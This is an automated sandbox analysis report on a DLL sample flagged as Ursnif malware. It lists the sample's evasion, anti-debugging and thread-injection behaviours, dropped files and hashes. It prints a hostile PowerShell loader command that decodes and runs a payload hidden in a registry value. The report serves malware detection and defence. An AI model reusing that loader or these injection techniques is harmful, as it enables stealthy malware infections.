Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\mshta.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3861

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880

Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_043A056C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438BF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_0438BF1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_0439AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04399363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_04399363

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_04395ECD

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04391007 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_04391007

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04393589 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

1_2_04393589

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread created: unknown EIP: 736E1580

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: unknown protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5728			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8C67.tmp' 'c:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9D01.tmp' 'c:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04398436 cpuid

1_2_04398436

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_043912B3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_043912B3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0439F46C GetSystemTimeAsFileTime,HeapFree,

1_2_0439F46C

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_0438B96C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04385CA8 SleepEx,GetVersion,GetModuleHandleA,GetProcAddress,

1_2_04385CA8

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

ID:	341938
Product:	CloudBasic
Start time:	07:45:55
Start date:	20.01.2021
Sample:	6007d134e83fctar.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	718cd91e1249f01f6488998c93c79212
SHA1:	c40730026671a6757e42e91961178dbcbb1c2e47
SHA256:	691fdaeb03dfa2b239d82322a3fd47c3b952ae9d47effa0100153fde537dc4e5
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\HQNFLJEY\contextual.media[1].xml	ASCII text, with very long lines, with no line terminators	94FBA044C6A18C426C90686F7780D201	7F337F7A32823D919389CB8BF87202FF70BE1D2E	BEE0DDC8C8FF9404E461C791BA74A110012DAF92FB270FF3EEE114EA6802C526
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\VY83BLT8\www.msn[1].xml	ASCII text, with no line terminators	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B388A325-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	FC4AA61848344CE29D4DD6E73C0B945E	F40CBC0AB4B0B3F69DBBCF6EB4081F59701B50BA	614D64B428FF2512007C2D863CEB03B4FE0ECF8ADFF9F203ADB9C47FDA3C0D8C
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B388A327-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	5F1B99B5561C864357768F5B24D2923D	F22B108553A39C89E720ED97816E2E65D58970F2	90D4C369AFD9DD3C48B7D50D767BBD84162DEE4B3B4FBFA5FAFC7AFCCF7C8747
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CF5A71D7-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	CD4C52DF41AD19E90F12C458C2D0CCB1	AD4DC37F4A679F16679CBAC20538EECF04280F79	6D812ECEEFE338B947AF4A101B67DE6648687FB9AEE2B55DF8BF71EBAA0940BD
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DD24AED3-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	F08564F172CBAEDEFD931B4DFBF2D473	381A3F1D9FB24BF95B42062FE5979C675BB75640	3C79432F7537209A1606CEC76F540E86D2160CB4A93395717F3E8DC26B9B5D8E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DD24AED5-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	8AB41BEBB353F5DC7B11B45615A099F5	B959155CCD30880EB080DE41908216B4E3F71364	3E58038BD8E747653D5626AFE28065ECB5DF9D5F795EAFFF8574BF89E7812696
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DD24AED7-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	ED632AF013EA5CB95C5EB28B142296F4	6BC33B79F816504D7A42D839D2F58C2B65DB6EEF	74EC77C6ED8D86FB26B029195E4283FE2D41A5237EF64989F8895D0F9F03A458
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E6720C44-5B36-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	26EF769F35B676B6BC80068E60EF7564	52D8A272CDE5421D8E944B03F4750B5781625797	45027AA0FFC8E68CBCCE7832080C4A650E839855BCBF04A2E591AC02970D93CE
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	8610413A37ABAB18F929272CA080957F	F15F785C3975B290FF241926A884263D26912605	18F21575CF7C9E4AD1A87A7183489C154E950F4677F417330250C59166DFF5CD
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	B2688E17DDBBEEFF198917E2CB3FBC94	BDE6AA40E34DE9FDE067A1570C74C0509B059EF3	8CD5D78E090A36A0F69EAFD08CF46D917BE7A02314982F7476518F4C0C389C82
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	FF2DD84933C20B6DACFC6B2527CC3F25	0CAF97D3F5851FED8741442C2D896E50C75E509A	2DFF03ACBEFAF3258661B0AC954659EF15406B206C32B18766B53F5613F09E85
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	4E958FCBFA1B8C332316D040432DA64D	3BAE797DE462DABC3E6AAE092E24ADAB8C0836CE	0DE55EFA4797B204F23AE8F7E5EC73AC236AB64326A9DE192DA884DB55836C9E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	EEA481908A1E2CCC80B96454724A83F7	685999749F4C501C07693C14800569C98E602CC1	BAFE512BDDC9974B2394931A0BC00EC9B4D95773137767391C2AFF4E1A2B6976
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	8F9DB6DDD4144DB03EDBF17A773436CA	610CCD465A55DEFBDE55D15FBDDEE55D0349B559	C75B02AA436BE2FA1F7AF746778A31DECB6FE7250E21C58893DA370605E827C3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	772B98F7982EF29FF30A709950751FBD	4482CABCCB3F98EFE607914C2321F49C49218AE3	6B890D5EEA25A193E48F888AC1FFB9D10FA22D8725FC0B306F5915D4EB0A23FC
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	18BA93A75BFD1B1A60324B275237DB13	B55CDA7708CB8A7F527D0B8F5A32DC68D2BDDD5E	062CDC8465BBE4A9D17064C290E68CF2B7D2D77C8B611B660CDC77533F6D44D4
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	27211701C4942DBA2A485AAB0EB54728	B0AA2694F284A101068D6EAC352FD2D36EA6E9CE	4F413D10C8B92A6F44EDA9289890B45347675D538251FCE552A397D21FC0ACA5
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat	data	39566726D8E144BA8A64CA6E62F636D9	6E6B3749F0187D8B15D8B8398A323468345F654E	B635F46308EF2589624F0841CE75FFD978249502538A47D1ED8C2B78D45B8360
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\58-acd805-185735b[1].css	UTF-8 Unicode text, with very long lines	3BA653386966EC654F176EAC2283E44A	6F722BB5946F28298FDBCB559D1590871AA817F3	99912374675266F0431853D948ABF2114E6B2351EB877D0675301D35DA58142C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\85-0f8009-68ddb2ab[1].js	UTF-8 Unicode text, with very long lines, with no line terminators	CA9F525C6154EF6AFF6C6FF9D0B07779	45F00ABA2CC9F7A1C6BF8691BED0AEB27F2590B9	6F9FA21C6054E989A07CFC4AAE340FBE344BEE95BFB2DCE3CF616AF1FB4BAB5B
